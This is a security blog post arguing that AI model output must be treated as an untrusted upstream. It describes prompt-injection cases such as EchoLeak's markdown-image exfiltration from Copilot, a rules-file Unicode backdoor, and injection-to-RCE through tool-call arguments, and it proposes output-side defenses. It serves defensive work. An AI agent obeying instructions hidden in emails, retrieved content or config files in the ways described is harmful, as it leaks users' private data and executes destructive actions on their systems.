Skip to main content

Output As Payload: Your AI Threat Model Got Half The Boundary

· 9 min read
Tian Pan
Software Engineer

The threat model your team wrote for AI features almost certainly stops at the model. Inputs are untrusted: prompt injection, jailbreaks, adversarial uploads, poisoned retrieval. Outputs are content: things to moderate for safety, score on a refusal eval, ship to the user. The shape of that threat model is roughly "untrusted thing goes in, model thinks, safe thing comes out."

The new attack class flips that polarity. The model's output is rendered, parsed, executed, or relayed by a downstream system, and an attacker who can shape that output — through indirect prompt injection in retrieval, training-data influence, or socially engineered user queries — can deliver a payload to a target the model never had direct access to. The model becomes a confused deputy with reach the attacker doesn't have, and the boundary your team is defending is two systems too early.

EchoLeak is the canonical 2025 example. A single crafted email arrives in a Microsoft 365 mailbox. Copilot ingests it as part of routine context. The hidden instructions cause Copilot to embed sensitive context into a reference-style markdown link in its response, and the client interface auto-fetches the external image — exfiltrating chat logs, OneDrive content, and Teams messages without a single user click. Microsoft's input-side classifier was bypassed because the attack didn't need to break the model's refusal calibration. It needed to shape one specific token sequence in the output.

The Four Output Channels Nobody Threat-Modeled

Treat every place a model's output crosses a boundary as a separate attack surface. There are at least four of them, and most teams ship having defended none.

Rendered markdown and HTML. The model emits a string. The frontend renders it. Markdown image tags fetch URLs. Hyperlinks become clickable. Reference-style links bypass naive sanitizers that only look at inline syntax. CSP rules that allow image fetches from any domain — or from a domain the attacker controls a doc on, like a Google Forms endpoint — turn rendering into exfiltration. Simon Willison has documented this pattern across Anthropic, xAI, Google NotebookLM, ChatGPT, and Amazon Q. Each instance was a separate product team independently deciding markdown rendering was safe.

Structured output consumed by a validator. The model emits JSON. A downstream parser consumes it. The schema check passes shape but not semantics. A field typed as string accepts any string, including one with embedded newlines, control characters, or values designed to exploit a parser CVE three layers down. The eval suite covers the happy path. The validator is "strict" in the sense that constrained decoding guarantees valid JSON — and silent on whether a valid-JSON value of id: "../../etc/passwd" is something the consumer wants to dereference.

Generated code. The model produces a code suggestion. The developer accepts it. The Rules File Backdoor demonstrated in early 2025 that hidden Unicode in .cursor/rules and equivalent Copilot config files can steer code generation toward a backdoor that passes review because the diff looks clean. CamoLeak showed a Copilot variant that leaked private source. The Amazon Q Developer extension shipped through Visual Studio Marketplace with an attacker-injected instruction telling the AI to wipe users' systems — present in a release with 964,000 installations for two days, and harmless only because the payload had a syntax error.

Tool-call arguments. The model emits a tool call. The harness validates the schema and dispatches. The argument is {"path": "/etc/shadow"} or {"sql": "DROP TABLE users"} or {"url": "http://internal.api/admin"}. The tool's input contract is "string." The string is well-formed. The runtime executes. Trail of Bits documented prompt-injection-to-RCE chains in agentic IDEs through exactly this pathway in late 2025 — the harm wasn't that the model was tricked into refusing wrong, it's that the agent had a code-execution tool and the attacker shaped the argument.

Why Classical AppSec Already Solved This — For Other Untrusted Sources

The discipline isn't new. We've spent thirty years internalizing that user input is untrusted, that third-party API responses are untrusted, that everything crossing a trust boundary needs encoding for its destination context. HTML encode for the DOM. SQL parameterize for the database. Allowlist for the shell. Strip protocols for redirect parameters. Validate semantic constraints, not just shape.

What changed in the AI era isn't the principle. It's that teams failed to apply the principle to a new untrusted source: the model itself. The model is now an upstream of every system that consumes its output. A model under indirect-prompt-injection influence is a malicious upstream by definition. The mitigations are the same mitigations classical AppSec already worked out — they just need to be wired in at the new boundary.

OWASP's 2025 LLM Top 10 names this LLM05: Improper Output Handling, with mitigations that read like a 2010 web-app primer: apply Zero Trust to the LLM's output, validate before the output drives any other function, and use context-aware encoding (HTML for the web, escaping for SQL, allowlists for command construction). The fix isn't AI-specific. The framing is. Treating the model output as a downstream-facing untrusted source is what unlocks the existing playbook.

The Three Defenses That Have To Land

Render-time sanitization that doesn't trust the model's restraint. Strip or rewrite markdown image tags whose hosts aren't on an allowlist. Block reference-style links that resolve to an attacker-controlled domain. Default the frontend's CSP to deny remote content fetches in AI-generated UI the same way browser CSP defaults to denying third-party scripts. Do this whether or not your safety eval shows the model "shouldn't" emit those tags. The model might not shouldn't today; the model under attack will.

Schema validation that goes past shape into semantics. A "delete-file" tool argument has to match an allowlist of paths the user owns, not just a string regex. A SQL tool either generates against a parameterized template or runs through a query-rewriter that allowlists tables and columns. A URL argument resolves and gets policy-checked before it's fetched. Constrained decoding makes the JSON valid. It doesn't make the values safe — that's a layer your team owns above the structured-output API.

Output-side red-teaming in eval. Most safety evals assert "the model refuses." That's the input-side discipline. Output-side evals assert "the boundary catches it." Inject adversarial content into retrieval and assert the rendering layer strips the resulting markdown image tag. Inject a prompt that tries to elicit a tool call to a denied path and assert the validator rejects the argument. The unit of test is the system, not the model. A model that emits a payload but a boundary that strips it is acceptable. A model that refuses today but a boundary that would have rendered the payload is one indirect-injection attempt away from EchoLeak.

The Org Failure Mode That Makes This Worse

The threat model usually splits across three teams. Security models the input gateway: prompt templates, retrieval indexes, API perimeter. The AI team models the model: refusal calibration, safety eval, jailbreak resistance. The frontend team owns rendering, the platform team owns the tool runtime, and neither was in the room when "AI feature security" was the agenda.

The output rendering layer is where the user sees what the model wrote. The tool runtime is where the model's words become side effects. Both are downstream of the model and upstream of harm. Both need an owner with the threat model in their head. EchoLeak shipped because no single team owned the proposition that "Copilot might be coerced into emitting a markdown image tag and our renderer fetches it." That proposition has to belong to someone — usually the team that owns the surface where the rendering or execution happens, briefed by the team that owns the model.

The fix is organizational. Add the renderer team and the tool-runtime team to the AI threat-modeling sessions. Make output-side red-teaming part of the security review checklist, not just refusal-rate dashboards. Treat "what does the AI's output touch downstream" as a question with a named owner for each touch point.

What Defense In Depth Looks Like Here

Borrow Simon Willison's "lethal trifecta" frame. The exfiltration risk is severe when three properties combine: the agent has access to private data, the agent is exposed to untrusted content, and the agent can communicate externally — through tool use, rendered links, or fetched images. Break any leg and the trifecta collapses.

In practice, that means architectural choices upstream of any specific defense. Don't give the agent that ingests email the same context as the agent that talks to your CRM. Strip outbound network egress from the rendering surface even if it costs a feature. Sandbox the code-execution tool from the data-retrieval tool. The MAESTRO threat-modeling framework from CSA spells out a similar layering: trust boundaries, context isolation, least-privilege tool design, output verification, continuous red-teaming. Each layer assumes the layer above can be bypassed, because the model under adversarial influence is a layer that will be bypassed.

The cost frame nobody surfaces is that this work is not "AI security" — it's the AppSec work the team should have done for any new untrusted upstream, just applied to a source that wasn't on anyone's asset register. Headcount-wise, it lives somewhere between the AI team and the security team, and the organization that doesn't pick an owner pays the bill at incident time. EchoLeak got patched server-side without an advisory. The next one might not.

The Architectural Realization

The model is upstream of every system that consumes its output. Once you accept that frame, the playbook collapses into something familiar: encode at boundaries, validate semantically, allowlist destinations, sandbox executions, and red-team the system end-to-end rather than the model in isolation. The AI-specific part is recognizing the model belongs in the "untrusted upstream" column on your trust map. The rest is AppSec.

The teams that ship AI features with the input-side threat model alone are running half the equation. The output side is where the payload lands, where the user clicks, where the tool fires. A safety eval that says the model refuses is a useful signal about the model. It is not a security claim about the system. The security claim has to come from the boundaries the model's output crosses — and those boundaries are owned by teams that need the threat model in their hands before the next indirect-prompt-injection demo turns into the next CVE.

References:Let's stay in touch and Follow me for more thoughts and updates